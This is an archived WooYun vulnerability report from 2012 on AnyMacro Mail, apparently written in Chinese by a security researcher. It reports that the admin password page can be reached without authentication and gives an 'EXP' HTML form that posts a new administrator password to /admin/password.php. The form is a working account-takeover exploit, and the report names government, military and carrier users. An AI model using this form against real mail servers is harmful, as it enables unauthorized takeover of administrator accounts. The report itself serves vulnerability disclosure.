漏洞概要关注数(36) 关注此漏洞
缺陷编号: WooYun-2012-06672
漏洞标题: AnyMacro Mail 重大漏洞 涉及政府、军工、收费运营商、大型企业
相关厂商: AnyMacro Mail
漏洞作者: 松子
提交时间: 2012-05-04
公开时间: 2012-06-18
漏洞类型: 非授权访问/权限绕过
危害等级: 高
自评Rank: 20
漏洞状态: 已交由第三方厂商(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org
Tags标签: 第三方不可信程序 敏感接口缺乏认证 敏感接口未加权限认证 AnyMacro-Mail
漏洞详情
披露状态:
2012-05-04: 细节已通知厂商并且等待厂商处理中
2012-05-07: 厂商已经确认,细节仅向厂商公开
2012-05-17: 细节向核心白帽子及相关领域专家公开
2012-05-27: 细节向普通白帽子公开
2012-06-06: 细节向实习白帽子公开
2012-06-21: 细节向公众公开
简要描述:
对于设置密码的页面存在漏洞可以直接修改原密码,本人技术很菜找不到路径拿不到shell
用的地方还是挺多的。涉及政府、军工、收费运营商、大型企业怕和谐所以放出了。
详细说明:
漏洞证明:
EXP:
<html>
<head>
<title> </title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link rel="stylesheet" href="tpl/sysadm.css" type="text/css">
</head>
<body class=bgcolor3>
<br><br><br><br><br><br>
<table width=260 cellspacing=0 cellpadding=0 align=center valign=middle>
<tr height=11 class=bgcolor1>
<td width=11><img src=tpl/image/topleft.gif></td>
<td></td>
<td width=11><img src=tpl/image/topright.gif></td>
</tr>
<tr align=center class=bgcolor1>
<td width=11></td>
<td class=font13><p class=font14><br><b>设置邮件系统管理密码</b></p>
<form method=post action=网址/admin/password.php>
密 码: <input type=password name=password size=14><p>
重输密码: <input type=password name=password2 size=14><p>
<input type=submit value="修改密码">
</form>
</td>
<td width=11></td>
</tr>
<tr height=11 class=bgcolor1>
<td width=11><img src=tpl/image/bottomleft.gif></td>
<td></td>
<td width=11><img src=tpl/image/bottomright.gif></td>
</tr>
</table>
<br><br><br><br><br><br><br>
<table cellspacing=0 cellpadding=0 height=1 width=500 align=center><tr><td
class=bgcolor1></td></tr>
<tr><td align=center height=35 valign=bottom class=bgcolor3>Copyright © 2002 Beijing
Anymacro Investment Ltd. All Rights Reserved.<br>
北京安宁投资有限公司 版权所有 </td></tr>
</table>
</body>
修复方案:
自己搞